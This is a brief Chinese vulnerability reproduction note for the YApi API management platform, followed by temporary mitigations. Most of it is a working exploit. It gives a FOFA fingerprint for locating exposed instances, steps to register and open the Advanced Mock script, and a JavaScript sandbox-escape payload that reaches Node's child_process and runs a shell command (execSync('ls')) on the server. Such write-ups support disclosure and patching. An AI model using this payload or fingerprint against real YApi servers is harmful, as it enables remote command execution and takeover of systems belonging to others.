一、YAPI
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
二、漏洞复现
fofa指纹app="YAPI"
打开登录页面,注册账号,新增项目,新增接口
打开高级Mock
在脚本内插入payload
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ls").toString()
保存后访问个人接口地址
三、临时解决方案
截止至7月8日,官方暂未发布新版本,临时解决方案如下:
1、关闭注册功能
2、关闭Mock功能
3、限制白名单访问